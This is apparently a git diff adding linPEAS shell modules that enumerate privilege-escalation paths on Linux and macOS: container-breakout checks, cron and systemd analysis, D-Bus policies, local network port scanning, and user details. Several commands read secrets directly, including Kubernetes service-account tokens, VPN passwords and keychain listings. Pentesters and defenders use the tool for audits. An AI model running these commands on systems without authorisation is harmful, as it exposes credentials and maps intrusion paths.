+ +#If docker +if echo "$containerType" | grep -qi "docker"; then + print_2title "Docker Container details" + inDockerGroup + print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Looking and enumerating Docker Sockets\n"$NC + enumerateDockerSockets + print_list "Docker version .................$NC$dockerVersion" + checkDockerVersionExploits + print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + if [ "$inContainer" ]; then + checkDockerRootless + print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," + fi + if df -h | grep docker; then + print_2title "Docker Overlays" + df -h | grep docker + fi +fi + +if [ "$inContainer" ]; then + echo "" + print_2title "Container & breakout enumeration" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" + print_list "Container ID ...................$NC $(cat /etc/hostname && echo '')" + if echo "$containerType" | grep -qi "docker"; then + print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" + fi + if echo "$containerType" | grep -qi "kubernetes"; then + print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" + print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" + fi + + checkContainerExploits + print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + echo "" + + print_2title "Container Capabilities" + capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" + echo "" + + print_2title "Privilege Mode" + if [ -x "$(command -v fdisk)" ]; then + if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then + echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," + else + echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," + fi + else + echo_not_found + fi + echo "" + + print_2title "Interesting Files Mounted" + (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" + echo "" + + print_2title "Possible Entrypoints" + ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq + echo "" +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/3_procs_crons_timers_srvcs_sockets.sh b/linPEAS/builder/linpeas_parts/3_procs_crons_timers_srvcs_sockets.sh new file mode 100644 index 0000000..80961fa --- /dev/null +++ b/linPEAS/builder/linpeas_parts/3_procs_crons_timers_srvcs_sockets.sh @@ -0,0 +1,306 @@ + +#################################################### +#-----) Processes & Cron & Services & Timers (-----# +#################################################### + +#-- PCS) Cleaned proccesses +print_2title "Cleaned processes" +if [ "$NOUSEPS" ]; then + printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC +fi +print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + +if [ "$NOUSEPS" ]; then + print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + pslist=$(print_ps) +else + (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then + cpid=$(echo "$psline" | awk '{print $2}') + caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + fi + fi + done + pslist=$(ps auxwww) + echo "" + + #-- PCS) Binary processes permissions + print_2title "Binary processes permissions (non 'root root' and not beloging to current user)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + binW="IniTialiZZinnggg" + ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do + if [ -w "$bpath" ]; then + binW="$binW|$bpath" + fi + done + ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," +fi +echo "" + +#-- PCS) Files opened by processes belonging to other users +if ! [ "$IAMROOT" ]; then + print_2title "Files opened by processes belonging to other users" + print_info "This is usually empty because of the lack of privileges to read other user processes information" + lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + echo "" +fi + +#-- PCS) Processes with credentials inside memory +print_2title "Processes with credentials in memory (root req)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" +if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi +if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi +if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi +if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi +if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi +if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi +echo "" + +#-- PCS) Different processes 1 min +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then + print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" + temp_file=$(mktemp) + if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi + echo "" +fi + +#-- PCS) Cron +print_2title "Cron jobs" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" +command -v crontab 2>/dev/null || echo_not_found "crontab" +crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +command -v incrontab 2>/dev/null || echo_not_found "incrontab" +incrontab -l 2>/dev/null +ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" +cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +crontab -l -u "$USER" 2>/dev/null | tr -d "\r" +ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths +atq 2>/dev/null +echo "" + +if [ "$MACPEAS" ]; then + print_2title "Third party LaunchAgents & LaunchDemons" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" + ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null + echo "" + + print_2title "Writable System LaunchAgents & LaunchDemons" + find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do + program="" + program=$(defaults read "$f" Program 2>/dev/null) + if ! [ "$program" ]; then + program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + fi + if [ -w "$program" ]; then + echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi + done + echo "" + + print_2title "StartupItems" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" + ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null + echo "" + + print_2title "Login Items" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" + osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null + echo "" + + print_2title "SPStartupItemDataType" + system_profiler SPStartupItemDataType + echo "" + + print_2title "Emond scripts" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" + ls -l /private/var/db/emondClients + echo "" +fi + +#-- PCS) Services +if [ "$EXTRA_CHECKS" ]; then + print_2title "Services" + print_info "Search for outdated versions" + (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" + echo "" +fi + +#-- PSC) systemd PATH +print_2title "Systemd PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" +systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" +WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") +echo "" + +#-- PSC) .service files +#TODO: .service files in MACOS are folders +print_2title "Analyzing .service files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" +printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do + if [ ! -O "$s" ]; then #Remove services that belongs to the current user + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" + fi + servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths + printf "%s\n" "$servicebinpaths" | while read sp; do + if [ -w "$sp" ]; then + echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" + fi + done + relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") + relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") + if [ "$relpath1" ] || [ "$relpath2" ]; then + if [ "$WRITABLESYSTEMDPATH" ]; then + echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; + else + echo "$s is executing some relative path" + fi + fi + fi +done +if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi +echo "" + +#-- PSC) Timers +print_2title "System timers" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found +echo "" + +#-- PSC) .timer files +print_2title "Analyzing .timer files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" +printf "%s\n" "$PSTORAGE_TIMER" | while read t; do + if ! [ "$IAMROOT" ] && [ -w "$t" ]; then + echo "$t" | sed -${E} "s,.*,${SED_RED},g" + fi + timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2) + printf "%s\n" "$timerbinpaths" | while read tb; do + if [ -w "$tb" ]; then + echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g" + fi + done + #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`" + #for rp in "$relpath"; do + # echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g" + #done +done +echo "" + +#-- PSC) .socket files +#TODO: .socket files in MACOS are folders +if ! [ "$IAMROOT" ]; then + print_2title "Analyzing .socket files" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" + printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do + if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then + echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g" + fi + socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketsbinpaths" | while read sb; do + if [ -w "$sb" ]; then + echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g" + fi + done + socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') + printf "%s\n" "$socketslistpaths" | while read sl; do + if [ -w "$sl" ]; then + echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g"; + fi + done + done + if ! [ "$IAMROOT" ] && [ -w "/var/run/docker.sock" ]; then + echo "Docker socket /var/run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" + fi + if ! [ "$IAMROOT" ] && [ -w "/run/docker.sock" ]; then + echo "Docker socket /run/docker.sock is writable (https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket)" | sed "s,/var/run/docker.sock is writable,${SED_RED_YELLOW},g" + fi + echo "" + + print_2title "Unix Sockets Listening" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sockets" + # Search sockets using netstat and ss + unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1) + if ! [ "$unix_scks_list" ];then + unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+") + fi + if ! [ "$unix_scks_list" ];then + unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2) + fi + + # But also search socket files + unix_scks_list2=$(find / -type s 2>/dev/null) + + # Detele repeated dockets and check permissions + (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort | uniq | while read l; do + perms="" + if [ -r "$l" ]; then + perms="Read " + fi + if [ -w "$l" ];then + perms="${perms}Write" + fi + if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g"; + else + echo "$l" | sed -${E} "s,$l,${SED_RED},g" + echo " └─(${RED}${perms}${NC})" + # Try to contact the socket + socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null) + if [ $? -eq 0 ]; then + owner=$(ls -l "$s" | cut -d ' ' -f 3) + echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" + echo "$socketcurl" | head -n 30 + fi + fi + done + echo "" +fi + +#-- PSC) Writable and weak policies in D-Bus config files +print_2title "D-Bus config files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +if [ "$PSTORAGE_DBUS" ]; then + printf "%s\n" "$PSTORAGE_DBUS" | while read d; do + for f in $d/*; do + if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" + fi + + genpol=$(grep "" "$f" 2>/dev/null) + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi + + userpol=$(grep "/dev/null | grep -v "root") + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #for g in `groups`; do + # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi + #done + grppol=$(grep "/dev/null | grep -v "root") + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + + #TODO: identify allows in context="default" + done + done +fi +echo "" + +print_2title "D-Bus Service Objects list" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" +dbuslist=$(busctl list 2>/dev/null) +if [ "$dbuslist" ]; then + busctl list | while read line; do + echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; + if ! echo "$line" | grep -qE "$dbuslistG"; then + srvc_object=$(echo $line | cut -d " " -f1) + srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') + if [ "$srvc_object_info" ]; then + echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," + fi + fi + done +else echo_not_found "busctl" +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/4_network_information.sh b/linPEAS/builder/linpeas_parts/4_network_information.sh new file mode 100644 index 0000000..c6255c8 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/4_network_information.sh @@ -0,0 +1,184 @@ +########################################### +#---------) Network Information (---------# +########################################### + +if [ "$MACOS" ]; then + print_2title "Network Capabilities" + warn_exec system_profiler SPNetworkDataType + echo "" +fi + +#-- NI) Hostname, hosts and DNS +print_2title "Hostname, hosts and DNS" +cat /etc/hostname /etc/hosts /etc/resolv.conf 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null +warn_exec dnsdomainname 2>/dev/null +echo "" + +#-- NI) /etc/inetd.conf +if [ "$EXTRA_CHECKS" ]; then + print_2title "Content of /etc/inetd.conf & /etc/xinetd.conf" + (cat /etc/inetd.conf /etc/xinetd.conf 2>/dev/null | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null) || echo_not_found "/etc/inetd.conf" + echo "" +fi + +#-- NI) Interfaces +print_2title "Interfaces" +cat /etc/networks 2>/dev/null +(ifconfig || ip a) 2>/dev/null +echo "" + +#-- NI) Neighbours +if [ "$EXTRA_CHECKS" ]; then + print_2title "Networks and neighbours" + if [ "$MACOS" ]; then + netstat -rn 2>/dev/null + else + (route || ip n || cat /proc/net/route) 2>/dev/null + fi + (arp -e || arp -a || cat /proc/net/arp) 2>/dev/null + echo "" +fi + +if [ "$MACPEAS" ]; then + print_2title "Firewall status" + warn_exec system_profiler SPFirewallDataType +fi + +#-- NI) Iptables +if [ "$EXTRA_CHECKS" ]; then + print_2title "Iptables rules" + (timeout 1 iptables -L 2>/dev/null; cat /etc/iptables/* | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null) 2>/dev/null || echo_not_found "iptables rules" + echo "" +fi + +#-- NI) Ports +print_2title "Active Ports" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports" +( (netstat -punta || ss -nltpu || netstat -anv) | grep -i listen) 2>/dev/null | sed -${E} "s,127.0.[0-9]+.[0-9]+|:::|::1:|0\.0\.0\.0,${SED_RED}," +echo "" + +#-- NI) MacOS hardware ports +if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then + print_2title "Hardware Ports" + networksetup -listallhardwareports + echo "" + + print_2title "VLANs" + networksetup -listVLANs + echo "" + + print_2title "Wifi Info" + networksetup -getinfo Wi-Fi + echo "" + + print_2title "Check Enabled Proxies" + scutil --proxy + echo "" + + print_2title "Wifi Proxy URL" + networksetup -getautoproxyurl Wi-Fi + echo "" + + print_2title "Wifi Web Proxy" + networksetup -getwebproxy Wi-Fi + echo "" + + print_2title "Wifi FTP Proxy" + networksetup -getftpproxy Wi-Fi + echo "" +fi + +#-- NI) tcpdump +print_2title "Can I sniff with tcpdump?" +timeout 1 tcpdump >/dev/null 2>&1 +if [ $? -eq 124 ]; then #If 124, then timed out == It worked + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sniffing" + echo "You can sniff with tcpdump!" | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi +echo "" + +#-- NI) Internet access +if ! [ "$SUPERFAST" ] && [ "$EXTRA_CHECKS" ] && ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ -f "/bin/bash" ]; then + print_2title "Internet Access?" + check_tcp_80 2>/dev/null & + check_tcp_443 2>/dev/null & + check_icmp 2>/dev/null & + check_dns 2>/dev/null & + wait + echo "" +fi + +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] || [ "$AUTO_NETWORK_SCAN" ]; then + if ! [ "$FOUND_NC" ]; then + printf $RED"[-] $SCAN_BAN_BAD\n$NC" + echo "The network is not going to be scanned..." + + else + print_2title "Scanning local networks (using /24)" + + if ! [ "$PING" ] && ! [ "$FPING" ]; then + printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" + fi + + select_nc + local_ips=$(ip a | grep -Eo 'inet[^6]\S+[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | awk '{print $2}' | grep -E "^10\.|^172\.|^192\.168\.|^169\.254\.") + printf "%s\n" "$local_ips" | while read local_ip; do + if ! [ -z "$local_ip" ]; then + print_3title "Discovering hosts in $local_ip/24" + + if [ "$PING" ] || [ "$FPING" ]; then + discover_network "$local_ip/24" | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Network Discovery" | grep -v "Network Discovery" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > $Wfolder/.ips.tmp + fi + + discovery_port_scan "$local_ip/24" 22 | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' | grep -A 256 "Ports going to be scanned" | grep -v "Ports going to be scanned" | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >> $Wfolder/.ips.tmp + + sort $Wfolder/.ips.tmp | uniq > $Wfolder/.ips + rm $Wfolder/.ips.tmp 2>/dev/null + + while read disc_ip; do + me="" + if [ "$disc_ip" = "$local_ip" ]; then + me=" (local)" + fi + + echo "Scanning top ports of ${disc_ip}${me}" + (tcp_port_scan "$disc_ip" "" | grep -A 1000 "Ports going to be scanned" | grep -v "Ports going to be scanned" | sort | uniq) 2>/dev/null + echo "" + done < $Wfolder/.ips + + rm $Wfolder/.ips 2>/dev/null + echo "" + fi + done + fi +fi + +if [ "$MACOS" ]; then + print_2title "Any MacOS Sharing Service Enabled?" + rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep "*.3283" | wc -l); + scrShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.5900" | wc -l); + flShrng=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep -E "\*.88|\*.445|\*.548" | wc -l); + rLgn=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.22" | wc -l); + rAE=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.3031" | wc -l); + bmM=$(netstat -na | grep LISTEN | grep -E 'tcp4|tcp6' | grep "*.4488" | wc -l); + printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM"; + echo "" + print_2title "VPN Creds" + system_profiler SPNetworkLocationDataType | grep -A 5 -B 7 ": Password" | sed -${E} "s,Password|Authorization Name.*,${SED_RED}," + echo "" + + if [ "$EXTRA_CHECKS" ]; then + print_2title "Bluetooth Info" + warn_exec system_profiler SPBluetoothDataType + echo "" + + print_2title "Ethernet Info" + warn_exec system_profiler SPEthernetDataType + echo "" + + print_2title "USB Info" + warn_exec system_profiler SPUSBDataType + echo "" + fi +fi \ No newline at end of file diff --git a/linPEAS/builder/linpeas_parts/5_users_information.sh b/linPEAS/builder/linpeas_parts/5_users_information.sh new file mode 100644 index 0000000..6ec65b8 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/5_users_information.sh @@ -0,0 +1,231 @@ +########################################### +#----------) Users Information (----------# +########################################### + +#-- UI) My user +print_2title "My user" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users" +(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" +echo "" + +if [ "$MACPEAS" ];then + print_2title "Current user Login and Logout hooks" + defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + echo "" + + print_2title "All Login and Logout hooks" + defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" + defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist + echo "" + + print_2title "Keychains" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker" + security list-keychains + echo "" + + print_2title "SystemKey" + ls -l /var/db/SystemKey + if [ -r "/var/db/SystemKey" ]; then + echo "You can read 